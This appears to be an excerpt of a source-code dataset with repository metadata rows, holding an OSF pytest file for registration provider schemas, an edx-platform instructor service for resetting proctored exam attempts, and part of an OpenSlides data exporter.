| bsd-2-clause | -1,112,329,128,676,382,200 | 41.346763 | 197 | 0.550669 | false |
adlius/osf.io | api_tests/providers/registrations/views/test_registration_provider_schemas.py | 1 | 4142 | import pytest
from api.base.settings.defaults import API_BASE
from osf_tests.factories import (
RegistrationProviderFactory,
AuthUserFactory
)
from osf.models import RegistrationSchema
from waffle.models import Flag
from osf.migrations import update_provider_auth_groups
@pytest.mark.django_db
class TestRegistrationProviderSchemas:
@pytest.fixture()
def user(self):
return AuthUserFactory()
@pytest.fixture()
def egap_flag(self):
flag = Flag.objects.get(name='egap_admins')
flag.everyone = True
flag.save()
return flag
@pytest.fixture()
def schema(self):
return RegistrationSchema.objects.get(name='Prereg Challenge', schema_version=2)
@pytest.fixture()
def egap_schema(self):
return RegistrationSchema.objects.get(name='EGAP Registration', schema_version=3)
@pytest.fixture()
def out_dated_schema(self):
reg_schema = RegistrationSchema(name='Prereg Challenge', schema_version=1)
reg_schema.save()
return reg_schema
@pytest.fixture()
def invisible_schema(self):
reg_schema = RegistrationSchema(name='Test Schema (Invisible)', schema_version=1, visible=False)
reg_schema.save()
return reg_schema
@pytest.fixture()
def inactive_schema(self):
reg_schema = RegistrationSchema(name='Test Schema (Inactive)', schema_version=1, active=False)
reg_schema.save()
return reg_schema
@pytest.fixture()
def provider(self, schema, out_dated_schema, invisible_schema, inactive_schema):
provider = RegistrationProviderFactory()
update_provider_auth_groups()
provider.schemas.add(*[schema, out_dated_schema, invisible_schema, inactive_schema])
provider.save()
return provider
@pytest.fixture()
def provider_with_v2_prereg_only(self, schema):
provider = RegistrationProviderFactory()
update_provider_auth_groups()
provider.schemas.add(schema)
provider.save()
return provider
@pytest.fixture()
def provider_with_egap_only(self, egap_schema):
provider = RegistrationProviderFactory()
update_provider_auth_groups()
provider.schemas.add(egap_schema)
provider.save()
return provider
@pytest.fixture()
def url(self, provider):
return f'/{API_BASE}providers/registrations/{provider._id}/schemas/'
@pytest.fixture()
def url_with_v2_prereg_only(self, provider_with_v2_prereg_only):
return f'/{API_BASE}providers/registrations/{provider_with_v2_prereg_only._id}/schemas/'
@pytest.fixture()
def url_with_egap_only(self, provider_with_egap_only):
return f'/{API_BASE}providers/registrations/{provider_with_egap_only._id}/schemas/'
def test_registration_provider_with_schema(
self,
app,
url,
schema,
user,
url_with_v2_prereg_only,
url_with_egap_only
):
res = app.get(url, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['id'] == schema._id
assert data[0]['attributes']['name'] == schema.name
res = app.get(url_with_v2_prereg_only, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['id'] == schema._id
assert data[0]['attributes']['name'] == schema.name
res = app.get(url_with_egap_only, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 0
def test_egap_registration_schema(
self,
app,
user,
egap_flag,
egap_schema,
url_with_egap_only
):
res = app.get(url_with_egap_only, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['id'] == egap_schema._id
assert data[0]['attributes']['name'] == egap_schema.name
| apache-2.0 | 6,367,725,758,147,988,000 | 29.681481 | 104 | 0.622646 | false |
mitocw/edx-platform | lms/djangoapps/instructor/services.py | 4 | 4998 | """
Implementation of "Instructor" service
"""
import logging
from django.core.exceptions import ObjectDoesNotExist
from django.utils.translation import ugettext as _
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey, UsageKey
import lms.djangoapps.instructor.enrollment as enrollment
from lms.djangoapps.courseware.models import StudentModule
from lms.djangoapps.commerce.utils import create_zendesk_ticket
from lms.djangoapps.instructor.views.tools import get_student_from_identifier
from student import auth
from student.roles import CourseStaffRole
from xmodule.modulestore.django import modulestore
log = logging.getLogger(__name__)
class InstructorService(object):
"""
Instructor service for deleting the students attempt(s) of an exam. This service has been created
for the edx_proctoring's dependency injection to cater for a requirement where edx_proctoring
needs to call into edx-platform's functions to delete the students' existing answers, grades
and attempt counts if there had been an earlier attempt.
"""
def delete_student_attempt(self, student_identifier, course_id, content_id, requesting_user):
"""
Deletes student state for a problem. requesting_user may be kept as an audit trail.
Takes some of the following query parameters
- student_identifier is an email or username
- content_id is a url-name of a problem
- course_id is the id for the course
"""
course_id = CourseKey.from_string(course_id)
try:
student = get_student_from_identifier(student_identifier)
except ObjectDoesNotExist:
err_msg = (
'Error occurred while attempting to reset student attempts for user '
u'{student_identifier} for content_id {content_id}. '
'User does not exist!'.format(
student_identifier=student_identifier,
content_id=content_id
)
)
log.error(err_msg)
return
try:
module_state_key = UsageKey.from_string(content_id)
except InvalidKeyError:
err_msg = (
u'Invalid content_id {content_id}!'.format(content_id=content_id)
)
log.error(err_msg)
return
if student:
try:
enrollment.reset_student_attempts(
course_id,
student,
module_state_key,
requesting_user=requesting_user,
delete_module=True,
)
except (StudentModule.DoesNotExist, enrollment.sub_api.SubmissionError):
err_msg = (
'Error occurred while attempting to reset student attempts for user '
u'{student_identifier} for content_id {content_id}.'.format(
student_identifier=student_identifier,
content_id=content_id
)
)
log.error(err_msg)
def is_course_staff(self, user, course_id):
"""
Returns True if the user is the course staff
else Returns False
"""
return auth.user_has_role(user, CourseStaffRole(CourseKey.from_string(course_id)))
def send_support_notification(self, course_id, exam_name, student_username, review_status, review_url=None):
"""
Creates a Zendesk ticket for an exam attempt review from the proctoring system.
Currently, it sends notifications for 'Suspicious" status, but additional statuses can be supported
by adding to the notify_support_for_status list in edx_proctoring/backends/software_secure.py
The notifications can be disabled by disabling the
"Create Zendesk Tickets For Suspicious Proctored Exam Attempts" setting in the course's Advanced settings.
"""
course_key = CourseKey.from_string(course_id)
course = modulestore().get_course(course_key)
if course.create_zendesk_tickets:
requester_name = "edx-proctoring"
email = "[email protected]"
subject = _(u"Proctored Exam Review: {review_status}").format(review_status=review_status)
body = _(
u"A proctored exam attempt for {exam_name} in {course_name} by username: {student_username} "
u"was reviewed as {review_status} by the proctored exam review provider.\n"
u"Review link: {review_url}"
).format(
exam_name=exam_name,
course_name=course.display_name,
student_username=student_username,
review_status=review_status,
review_url=review_url or u'not available',
)
tags = ["proctoring"]
create_zendesk_ticket(requester_name, email, subject, body, tags)
| agpl-3.0 | -2,426,297,679,966,818,000 | 40.65 | 114 | 0.623049 | false |
OpenSlides/OpenSlides | server/openslides/core/export.py | 3 | 69092 | import base64
import re
from collections import defaultdict
from datetime import datetime
from typing import Any
from asgiref.sync import async_to_sync
from django.conf import settings
from django.db import connections
from openslides.mediafiles.models import Mediafile
from openslides.mediafiles.views import use_mediafile_database
from openslides.motions.models import Motion
from openslides.users.views import demo_mode_users, is_demo_mode
from openslides.utils.cache import element_cache
def copy(obj, *attrs):
return {attr: obj[attr] for attr in attrs if attr in obj}
fromisoformat = getattr(datetime, "fromisoformat", None) # type: ignore
def to_unix_time(datetime_str):
if not datetime_str:
return None
if not fromisoformat:
return 0 # Only available with python >=3.7...
return int(fromisoformat(datetime_str).timestamp())
def max_or_zero(iterable):
as_list = list(iterable)
if len(as_list) == 0:
return 0
else:
return max(as_list)
COLLECTION_MAPPING = {
"agenda/item": "agenda_item",
"agenda/list-of-speakers": "list_of_speakers",
"assignments/assignment": "assignment",
"assignments/assignment-option": "option",
"assignments/assignment-poll": "poll",
"assignments/assignment-vote": "vote",
"chat/chat-group": "chat_group",
"core/countdown": "projector_countdown",
"core/projector": "projector",
"core/projector-message": "projector_message",
"mediafiles/mediafile": "mediafile",
"motions/category": "motion_category",
"motions/motion": "motion",
"motions/motion-block": "motion_block",
"motions/motion-change-recommendation": "motion_change_recommendation",
"motions/motion-comment-section": "motion_comment_section",
"motions/motion-option": "option",
"motions/motion-poll": "poll",
"motions/motion-vote": "vote",
"motions/state": "motion_state",
"motions/statute-paragraph": "motion_statute_paragraph",
"motions/workflow": "motion_workflow",
"topics/topic": "topic",
"users/group": "group",
"users/personal-note": "personal_note",
"users/user": "user",
}
PERMISSION_MAPPING = {
"agenda.can_see": "agenda_item.can_see",
"agenda.can_see_internal_items": "agenda_item.can_see_internal",
"agenda.can_manage": "agenda_item.can_manage",
"assignments.can_see": "assignment.can_see",
"assignments.can_manage": "assignment.can_manage",
"assignments.can_nominate_other": "assignment.can_nominate_other",
"assignments.can_nominate_self": "assignment.can_nominate_self",
"chat.can_manage": "chat.can_manage",
"agenda.can_see_list_of_speakers": "list_of_speakers.can_see",
"agenda.can_manage_list_of_speakers": "list_of_speakers.can_manage",
"agenda.can_be_speaker": "list_of_speakers.can_be_speaker",
"mediafiles.can_see": "mediafile.can_see",
"mediafiles.can_manage": "mediafile.can_manage",
"core.can_manage_config": "meeting.can_manage_settings",
"core.can_manage_logos_and_fonts": "meeting.can_manage_logos_and_fonts",
"core.can_see_frontpage": "meeting.can_see_frontpage",
"core.can_see_autopilot": "meeting.can_see_autopilot",
"core.can_see_livestream": "meeting.can_see_livestream",
"core.can_see_history": "meeting.can_see_history",
"motions.can_see": "motion.can_see",
"motions.can_see_internal": "motion.can_see_internal",
"motions.can_manage": "motion.can_manage",
"motions.can_manage_metadata": "motion.can_manage_metadata",
"motions.can_manage_polls": "motion.can_manage_polls",
"motions.can_create": "motion.can_create",
"motions.can_create_amendments": "motion.can_create_amendments",
"motions.can_support": "motion.can_support",
"core.can_see_projector": "projector.can_see",
"core.can_manage_projector": "projector.can_manage",
"core.can_manage_tags": "projector.can_manage",
"users.can_see_extra_data": "user.can_see_extra_data",
"users.can_see_name": "user.can_see",
"users.can_manage": "user.can_manage",
"users.can_change_password": None,
}
PERMISSION_HIERARCHIE = {
"agenda_item.can_manage": ["agenda_item.can_see_internal", "agenda_item.can_see"],
"agenda_item.can_see_internal": ["agenda_item.can_see"],
"assignment.can_manage": ["assignment.can_nominate_other", "assignment.can_see"],
"assignment.can_nominate_other": ["assignment.can_see"],
"assignment.can_nominate_self": ["assignment.can_see"],
"list_of_speakers.can_manage": ["list_of_speakers.can_see"],
"list_of_speakers.can_be_speaker": ["list_of_speakers.can_see"],
"mediafile.can_manage": ["mediafile.can_see"],
"motion.can_manage": [
"motion.can_manage_metadata",
"motion.can_manage_polls",
"motion.can_see_internal",
"motion.can_create",
"motion.can_create_amendments",
"motion.can_see",
],
"motion.can_manage_metadata": ["motion.can_see"],
"motion.can_manage_polls": ["motion.can_see"],
"motion.can_see_internal": ["motion.can_see"],
"motion.can_create": ["motion.can_see"],
"motion.can_create_amendments": ["motion.can_see"],
"motion.can_support": ["motion.can_see"],
"projector.can_manage": ["projector.can_see"],
"user.can_manage": ["user.can_see_extra_data", "user.can_see"],
"user.can_see_extra_data": ["user.can_see"],
}
PROJECTION_DEFAULT_NAME_MAPPING = {
"agenda_all_items": "agenda_all_items",
"topics": "topics",
"agenda_list_of_speakers": "list_of_speakers",
"agenda_current_list_of_speakers": "current_list_of_speakers",
"motions": "motion",
"amendments": "amendment",
"motionBlocks": "motion_block",
"assignments": "assignment",
"users": "user",
"mediafiles": "mediafile",
"messages": "projector_message",
"countdowns": "projector_countdowns",
"assignment_poll": "assignment_poll",
"motion_poll": "motion_poll",
}
class OS4ExporterException(Exception):
pass
class OS4Exporter:
def __init__(self):
self.all_data = async_to_sync(element_cache.get_all_data_list)()
self._all_data_dict = None
self.data: Any = defaultdict(dict)
self.meeting: Any = {"id": 1, "projection_ids": []}
def get_data(self):
self.modify_motion_poll_ids()
self.fill_all_data_dict()
self.set_model("meeting", self.meeting)
self.migrate_agenda_items()
self.migrate_topics()
self.migrate_list_of_speakers()
self.migrate_voting_system()
self.migrate_tags()
self.migrate_chat_groups()
self.migrate_assignments()
self.migrate_mediafiles()
self.migrate_motions()
self.migrate_motion_comment_sections()
self.migrate_motion_blocks()
self.migrate_motion_categories()
self.migrate_motion_change_recommendations()
self.migrate_motion_statute_paragraphs()
self.migrate_motion_states()
self.migrate_motion_workflows()
self.migrate_projector_messages()
self.migrate_projector_countdowns()
self.migrate_personal_notes()
self.migrate_users()
self.migrate_groups()
self.migrate_projectors()
self.migrate_meeting()
# Note: When returning self.all_data one has access to the original data to compare it to the export.
# return {"all": self.all_data, "export": self.to_list_format()}
return self.to_list_format()
def set_model(self, collection, model):
if model["id"] in self.data[collection]:
raise OS4ExporterException(f"Tried to overwrite {collection}/{model['id']}")
self.data[collection][model["id"]] = model
def get_model(self, collection, id):
return self.data[collection][id]
def iter_collection(self, collection):
return self.data[collection].values()
def to_list_format(self):
data = {}
for collection, models in self.data.items():
data[collection] = list(models.values())
return data
def fill_all_data_dict(self):
self._all_data_dict = {}
for collection, models in self.all_data.items():
self._all_data_dict[collection] = {model["id"]: model for model in models}
def get_old_model(self, collection, id):
if not self._all_data_dict:
raise OS4ExporterException("Used too early!")
return self._all_data_dict[collection][id]
def get_collection(self, collection):
return self.all_data.get(collection, [])
def to_fqid(self, *args):
"""takes a {"collection": "..", "id": ..} dict or two params (collection, id) and converts it to an fqid"""
if len(args) == 1:
collection = args[0]["collection"]
id = args[0]["id"]
else:
collection = args[0]
id = args[1]
id = self.to_new_id(collection, id)
return f"{COLLECTION_MAPPING[collection]}/{id}"
def to_new_id(self, collection, id):
if collection == "motions/motion-poll":
id += self.motion_poll_id_offset
elif collection == "motions/motion-option":
id += self.motion_option_id_offset
elif collection == "motions/motion-vote":
id += self.motion_vote_id_offset
return id
def get_generic_reverse_relation(self, this_id, field, collections):
fqids = []
for collection in collections:
for model in self.get_collection(collection):
ids = model.get(field, [])
if this_id in ids:
fqids.append(self.to_fqid(collection, model["id"]))
return fqids
def modify_motion_poll_ids(self):
"""add max_or_zero(assignmentpoll_id) to every motion poll. The same for votes and options."""
# poll
self.motion_poll_id_offset = max_or_zero(
[x["id"] for x in self.get_collection("assignments/assignment-poll")]
)
self.motion_option_id_offset = max_or_zero(
[x["id"] for x in self.get_collection("assignments/assignment-option")]
)
self.motion_vote_id_offset = max_or_zero(
[x["id"] for x in self.get_collection("assignments/assignment-vote")]
)
for motion_poll in self.get_collection("motions/motion-poll"):
motion_poll["id"] += self.motion_poll_id_offset
for motion_option in self.get_collection("motions/motion-option"):
motion_option["id"] += self.motion_option_id_offset
motion_option["poll_id"] += self.motion_poll_id_offset
for motion_vote in self.get_collection("motions/motion-vote"):
motion_vote["id"] += self.motion_vote_id_offset
motion_vote["option_id"] += self.motion_option_id_offset
self.poll_id_counter = (
max_or_zero([x["id"] for x in self.get_collection("motions/motion-poll")])
+ 1
)
self.option_id_counter = (
max_or_zero([x["id"] for x in self.get_collection("motions/motion-option")])
+ 1
)
self.vote_id_counter = (
max_or_zero([x["id"] for x in self.get_collection("motions/motion-vote")])
+ 1
)
def migrate_agenda_items(self):
for old in self.get_collection("agenda/item"):
new = copy(
old,
"id",
"item_number",
"comment",
"closed",
"is_internal",
"is_hidden",
"level",
"weight",
"parent_id",
)
new["type"] = {1: "common", 2: "internal", 3: "hidden"}[old["type"]]
new["duration"] = old.get("duration", 0)
new["content_object_id"] = self.to_fqid(old["content_object"])
new["child_ids"] = [
x["id"]
for x in self.get_collection("agenda/item")
if x["parent_id"] == old["id"]
]
new["tag_ids"] = old["tags_id"]
new["projection_ids"] = []
new["meeting_id"] = 1
self.set_model("agenda_item", new)
def migrate_topics(self):
for old in self.get_collection("topics/topic"):
new = copy(
old, "id", "title", "text", "agenda_item_id", "list_of_speakers_id"
)
new["attachment_ids"] = old["attachments_id"]
new["option_ids"] = []
new["tag_ids"] = []
new["projection_ids"] = []
new["meeting_id"] = 1
self.set_model("topic", new)
def migrate_list_of_speakers(self):
for old in self.get_collection("agenda/list-of-speakers"):
new = copy(old, "id", "closed")
new["content_object_id"] = self.to_fqid(old["content_object"])
new["speaker_ids"] = self.create_speakers(old["speakers"], old["id"])
new["projection_ids"] = []
new["meeting_id"] = 1
self.set_model("list_of_speakers", new)
def create_speakers(self, speakers, los_id):
ids = []
for old in speakers:
new = copy(
old,
"id",
"note",
"point_of_order",
"user_id",
"weight",
)
new["begin_time"] = to_unix_time(old["begin_time"])
new["end_time"] = to_unix_time(old["end_time"])
if old["marked"]:
new["speech_state"] = "contribution"
elif old["pro_speech"] is True:
new["speech_state"] = "pro"
elif old["pro_speech"] is False:
new["speech_state"] = "contra"
else:
new["speech_state"] = None
new["list_of_speakers_id"] = los_id
new["meeting_id"] = 1
ids.append(old["id"])
self.set_model("speaker", new)
return ids
def migrate_voting_system(self):
# reverse relations option/vote_ids and poll/option_ids are calculated at the end.
self.migrate_votes("assignments/assignment-vote")
self.migrate_votes("motions/motion-vote")
self.migrate_options("assignments/assignment-option")
self.migrate_options("motions/motion-option")
self.migrate_polls("assignments/assignment-poll")
self.migrate_polls("motions/motion-poll")
# motion polls
self.move_votes_to_global_options()
self.calculate_poll_reverse_relations()
def migrate_votes(self, collection):
for old in self.get_collection(collection):
new = copy(
old,
"id",
"weight",
"value",
"user_token",
"option_id",
"user_id",
"delegated_user_id",
)
new["meeting_id"] = 1
self.set_model("vote", new)
def migrate_options(self, collection):
for old in self.get_collection(collection):
new = copy(old, "id", "yes", "no", "abstain", "poll_id")
if "assignment" in collection:
new["content_object_id"] = self.to_fqid("users/user", old["user_id"])
else: # motion
poll = self.get_old_model("motions/motion-poll", old["poll_id"])
new["content_object_id"] = self.to_fqid(
"motions/motion", poll["motion_id"]
)
new["text"] = None
new["weight"] = old.get("weight", 1) # not defined for motion options
new["used_as_global_option_in_poll_id"] = None
new["meeting_id"] = 1
self.set_model("option", new)
def migrate_polls(self, collection):
for old in self.get_collection(collection):
new = copy(
old,
"id",
"title",
"type",
"is_pseudoanonymized",
"pollmethod",
"onehundred_percent_base",
"majority_method",
"votesvalid",
"votesinvalid",
"votescast",
"entitled_users_at_stop",
)
new["state"] = {1: "created", 2: "started", 3: "finished", 4: "published"}[
old["state"]
]
if "assignment" in collection:
new["content_object_id"] = self.to_fqid(
"assignments/assignment", old["assignment_id"]
)
else: # motion
new["content_object_id"] = self.to_fqid(
"motions/motion", old["motion_id"]
)
# these fields are not set by motion polls.
new["description"] = old.get("description", "")
new["min_votes_amount"] = old.get("min_votes_amount", 1)
new["max_votes_amount"] = old.get("max_votes_amount", 1)
new["global_yes"] = old.get("global_yes", False)
new["global_no"] = old.get("global_no", False)
new["global_abstain"] = old.get("global_abstain", False)
new["entitled_group_ids"] = old["groups_id"]
new["backend"] = "long"
new["voted_ids"] = old["voted_id"]
new["global_option_id"] = self.create_global_option(old)
new["projection_ids"] = []
new["meeting_id"] = 1
self.set_model("poll", new)
def create_global_option(self, poll):
id = self.poll_id_counter
self.poll_id_counter += 1
option = {
"id": id,
"weight": 1,
"text": None,
"yes": poll.get("amount_global_yes", "0.000000"),
"no": poll.get("amount_global_no", "0.000000"),
"abstain": poll.get("amount_global_abstain", "0.000000"),
"poll_id": None,
"used_as_global_option_in_poll_id": poll["id"],
"vote_ids": [],
"content_object_id": None,
"meeting_id": 1,
}
self.set_model("option", option)
return id
def move_votes_to_global_options(self):
for vote in self.iter_collection("vote"):
option = self.get_model("option", vote["option_id"])
poll = self.get_model("poll", option["poll_id"])
if vote["value"] not in poll["pollmethod"]:
# this vote is not valied for the method -> it must be a global vote.
# remove this vote from this option and add it to the global one.
# Do not care about the reverse relations - they are done later.
vote["option_id"] = poll["global_option_id"]
def calculate_poll_reverse_relations(self):
# poll/option_ids
for poll in self.iter_collection("poll"):
poll["option_ids"] = [
x["id"]
for x in self.iter_collection("option")
if x["poll_id"] == poll["id"]
]
# option/vote_ids
for option in self.iter_collection("option"):
option["vote_ids"] = [
x["id"]
for x in self.iter_collection("vote")
if x["option_id"] == option["id"]
]
def migrate_tags(self):
for old in self.get_collection("core/tag"):
new = copy(old, "id", "name")
new["tagged_ids"] = self.get_generic_reverse_relation(
old["id"],
"tags_id",
(
"agenda/item",
"topics/topic",
"motions/motion",
"assignments/assignment",
),
)
new["meeting_id"] = 1
self.set_model("tag", new)
def migrate_chat_groups(self):
for old in self.get_collection("chat/chat-group"):
new = copy(old, "id", "name")
new["weight"] = old["id"]
new["read_group_ids"] = old["read_groups_id"]
new["write_group_ids"] = old["write_groups_id"]
new["meeting_id"] = 1
self.set_model("chat_group", new)
def migrate_assignments(self):
for old in self.get_collection("assignments/assignment"):
new = copy(
old,
"id",
"title",
"description",
"open_posts",
"default_poll_description",
"number_poll_candidates",
"agenda_item_id",
"list_of_speakers_id",
)
new["phase"] = {0: "search", 1: "voting", 2: "finished"}[old["phase"]]
new["candidate_ids"] = self.create_assignment_candidates(
old["assignment_related_users"], old["id"]
)
new["poll_ids"] = [
x["id"]
for x in self.iter_collection("poll")
if x["content_object_id"] == f"assignment/{old['id']}"
]
new["attachment_ids"] = old["attachments_id"]
new["tag_ids"] = old["tags_id"]
new["projection_ids"] = []
new["meeting_id"] = 1
self.set_model("assignment", new)
def create_assignment_candidates(self, assignment_candidates, assignment_id):
ids = []
for old in assignment_candidates:
new = copy(old, "id", "weight", "user_id")
new["assignment_id"] = assignment_id
new["meeting_id"] = 1
ids.append(old["id"])
self.set_model("assignment_candidate", new)
return ids
def migrate_mediafiles(self):
for old in self.get_collection("mediafiles/mediafile"):
new = copy(
old,
"id",
"title",
"is_directory",
"mimetype",
"pdf_information",
"parent_id",
"list_of_speakers_id",
)
mediafile_blob_data = self.get_mediafile_blob_data(old)
if not mediafile_blob_data:
new["filename"] = old["title"]
new["filesize"] = 0
new["blob"] = None
else:
new["filename"], new["filesize"], new["blob"] = mediafile_blob_data
new["create_timestamp"] = to_unix_time(old["create_timestamp"])
new["access_group_ids"] = old["access_groups_id"]
new["is_public"] = old["inherited_access_groups_id"] is True
inherited_access_groups_id = old["inherited_access_groups_id"]
if inherited_access_groups_id in (True, False):
new["inherited_access_group_ids"] = []
else:
new["inherited_access_group_ids"] = inherited_access_groups_id
new["child_ids"] = [
x["id"]
for x in self.get_collection("mediafiles/mediafile")
if x["parent_id"] == old["id"]
]
new["attachment_ids"] = self.get_generic_reverse_relation(
old["id"],
"attachments_id",
(
"topics/topic",
"motions/motion",
"assignments/assignment",
),
)
new["projection_ids"] = []
# will be set when migrating the meeting
new["used_as_logo_$_in_meeting_id"] = []
new["used_as_font_$_in_meeting_id"] = []
new["meeting_id"] = 1
self.set_model("mediafile", new)
def get_mediafile_blob_data(self, old):
"""
Returns the tuple (filename, filesize, blob) with blob being base64 encoded
in a string. If there is an error or no mediafile, None is returned.
"""
if old["is_directory"]:
return None
try:
db_mediafile = Mediafile.objects.get(pk=old["id"])
except Mediafile.DoesNotExist:
return None
filename = db_mediafile.original_filename
if use_mediafile_database:
with connections["mediafiles"].cursor() as cursor:
cursor.execute(
"SELECT data FROM mediafile_data WHERE id = %s", [old["id"]]
)
row = cursor.fetchone()
if row is None:
return None
data = row[0]
else:
data = db_mediafile.mediafile.open().read()
blob = base64.b64encode(data).decode("utf-8")
return filename, len(data), blob
def migrate_motions(self):
recommendation_reference_motion_ids_regex = re.compile(
r"\[motion:(?P<id>\d+)\]"
)
db_number_values = {}
for motion in Motion.objects.all():
db_number_values[motion.id] = motion.identifier_number
for old in self.get_collection("motions/motion"):
new = copy(
old,
"id",
"title",
"text",
"modified_final_version",
"reason",
"category_weight",
"state_extension",
"recommendation_extension",
"sort_weight",
"state_id",
"recommendation_id",
"category_id",
"statute_paragraph_id",
"agenda_item_id",
"list_of_speakers_id",
)
new["number"] = old["identifier"]
new["number_value"] = db_number_values[old["id"]]
new["sequential_number"] = old["id"]
new["amendment_paragraph_$"] = []
if old["amendment_paragraphs"]:
for i, content in enumerate(old["amendment_paragraphs"]):
new["amendment_paragraph_$"].append(str(i + 1))
new[f"amendment_paragraph_${i+1}"] = content
new["sort_weight"] = old["weight"]
new["created"] = to_unix_time(old["created"])
new["last_modified"] = to_unix_time(old["last_modified"])
new["lead_motion_id"] = old["parent_id"]
new["amendment_ids"] = [
x["id"]
for x in self.get_collection("motions/motion")
if x["parent_id"] == old["id"]
]
new["sort_parent_id"] = old["sort_parent_id"]
new["sort_child_ids"] = [
x["id"]
for x in self.get_collection("motions/motion")
if x["sort_parent_id"] == old["id"]
]
new["origin_id"] = None
new["derived_motion_ids"] = []
new["forwarding_tree_motion_ids"] = []
new["block_id"] = old["motion_block_id"]
new["submitter_ids"] = self.create_motion_submitters(old["submitters"])
new["supporter_ids"] = old["supporters_id"]
new["poll_ids"] = [
x["id"]
for x in self.iter_collection("poll")
if x["content_object_id"] == f"motion/{old['id']}"
]
new["option_ids"] = [
x["id"]
for x in self.iter_collection("option")
if x["content_object_id"] == f"motion/{old['id']}"
]
new["change_recommendation_ids"] = old["change_recommendations_id"]
new["comment_ids"] = self.create_motion_comments(old["comments"], old["id"])
new["tag_ids"] = old["tags_id"]
new["attachment_ids"] = old["attachments_id"]
new[
"personal_note_ids"
] = [] # will be filled later while migrating personal notes
new["projection_ids"] = []
new["meeting_id"] = 1
new["recommendation_extension_reference_ids"] = []
if new["recommendation_extension"]:
def replace_fn(matchobj):
id = int(matchobj.group("id"))
new["recommendation_extension_reference_ids"].append(f"motion/{id}")
return f"[motion/{id}]"
new[
"recommendation_extension"
] = recommendation_reference_motion_ids_regex.sub(
replace_fn, new["recommendation_extension"]
)
self.set_model("motion", new)
for motion in self.iter_collection("motion"):
motion["referenced_in_motion_recommendation_extension_ids"] = [
x["id"]
for x in self.iter_collection("motion")
if f"motion/{motion['id']}"
in x["recommendation_extension_reference_ids"]
]
def create_motion_submitters(self, submitters):
ids = []
for old in submitters:
new = copy(old, "id", "motion_id", "weight", "user_id")
new["meeting_id"] = 1
ids.append(old["id"])
self.set_model("motion_submitter", new)
return ids
def create_motion_comments(self, comments, motion_id):
ids = []
for old in comments:
new = copy(old, "id", "section_id", "comment")
new["motion_id"] = motion_id
new["meeting_id"] = 1
ids.append(old["id"])
self.set_model("motion_comment", new)
return ids
def migrate_motion_comment_sections(self):
for old in self.get_collection("motions/motion-comment-section"):
new = copy(
old,
"id",
"name",
"weight",
)
new["read_group_ids"] = old["read_groups_id"]
new["write_group_ids"] = old["write_groups_id"]
new["comment_ids"] = [
x["id"]
for x in self.iter_collection("motion_comment")
if x["section_id"] == old["id"]
]
new["meeting_id"] = 1
self.set_model("motion_comment_section", new)
def migrate_motion_blocks(self):
for old in self.get_collection("motions/motion-block"):
new = copy(
old, "id", "title", "internal", "agenda_item_id", "list_of_speakers_id"
)
new["motion_ids"] = [
x["id"]
for x in self.get_collection("motions/motion")
if x["motion_block_id"] == old["id"]
]
new["projection_ids"] = []
new["meeting_id"] = 1
self.set_model("motion_block", new)
def migrate_motion_categories(self):
for old in self.get_collection("motions/category"):
new = copy(old, "id", "name", "prefix", "weight", "level", "parent_id")
new["child_ids"] = [
x["id"]
for x in self.get_collection("motions/category")
if x["parent_id"] == old["id"]
]
new["motion_ids"] = [
x["id"]
for x in self.get_collection("motions/motion")
if x["category_id"] == old["id"]
]
new["meeting_id"] = 1
self.set_model("motion_category", new)
def migrate_motion_change_recommendations(self):
for old in self.get_collection("motions/motion-change-recommendation"):
new = copy(
old,
"id",
"rejected",
"internal",
"other_description",
"line_from",
"line_to",
"text",
"motion_id",
)
new["type"] = {0: "replacement", 1: "insertion", 2: "deletion", 3: "other"}[
old["type"]
]
new["creation_time"] = to_unix_time(old["creation_time"])
new["meeting_id"] = 1
self.set_model("motion_change_recommendation", new)
def migrate_motion_statute_paragraphs(self):
for old in self.get_collection("motions/statute-paragraph"):
new = copy(old, "id", "title", "text", "weight")
new["motion_ids"] = [
x["id"]
for x in self.get_collection("motions/motion")
if x["statute_paragraph_id"] == old["id"]
]
new["meeting_id"] = 1
self.set_model("motion_statute_paragraph", new)
def migrate_motion_states(self):
for old in self.get_collection("motions/state"):
new = copy(
old,
"id",
"name",
"recommendation_label",
"allow_support",
"allow_create_poll",
"allow_submitter_edit",
"show_state_extension_field",
"show_recommendation_extension_field",
"workflow_id",
)
if old["css_class"] in (
"grey",
"red",
"green",
"lightblue",
"yellow",
):
new["css_class"] = old["css_class"]
else:
new["css_class"] = "lightblue"
new["restrictions"] = [
{
"motions.can_see_internal": "motion.can_see_internal",
"motions.can_manage_metadata": "motion.can_manage_metadata",
"motions.can_manage": "motion.can_manage",
"is_submitter": "is_submitter",
}[restriction]
for restriction in old["restriction"]
]
new["set_number"] = not old["dont_set_identifier"]
new["merge_amendment_into_final"] = {
-1: "do_not_merge",
0: "undefined",
1: "do_merge",
}[old["merge_amendment_into_final"]]
new["next_state_ids"] = old["next_states_id"]
new["previous_state_ids"] = [
x["id"]
for x in self.get_collection("motions/state")
if old["id"] in x["next_states_id"]
]
new["motion_ids"] = [
x["id"]
for x in self.get_collection("motions/motion")
if x["state_id"] == old["id"]
]
new["motion_recommendation_ids"] = [
x["id"]
for x in self.get_collection("motions/motion")
if x["recommendation_id"] == old["id"]
]
new[
"first_state_of_workflow_id"
] = None # will be set when migrating workflows.
new["meeting_id"] = 1
self.set_model("motion_state", new)
def migrate_motion_workflows(self):
for old in self.get_collection("motions/workflow"):
new = copy(
old,
"id",
"name",
"first_state_id",
)
new["state_ids"] = old["states_id"]
first_state = self.get_model("motion_state", old["first_state_id"])
first_state["first_state_of_workflow_id"] = old["id"]
# the following three will be set when migrating the meeting.
new["default_workflow_meeting_id"] = None
new["default_amendment_workflow_meeting_id"] = None
new["default_statute_amendment_workflow_meeting_id"] = None
new["meeting_id"] = 1
self.set_model("motion_workflow", new)
def migrate_projector_messages(self):
for old in self.get_collection("core/projector-message"):
new = copy(
old,
"id",
"message",
)
new["projection_ids"] = []
new["meeting_id"] = 1
self.set_model("projector_message", new)
def migrate_projector_countdowns(self):
for old in self.get_collection("core/countdown"):
new = copy(
old,
"id",
"title",
"description",
"default_time",
"countdown_time",
"running",
)
new["used_as_list_of_speaker_countdown_meeting_id"] = None
new["used_as_poll_countdown_meeting_id"] = None
new["projection_ids"] = []
new["meeting_id"] = 1
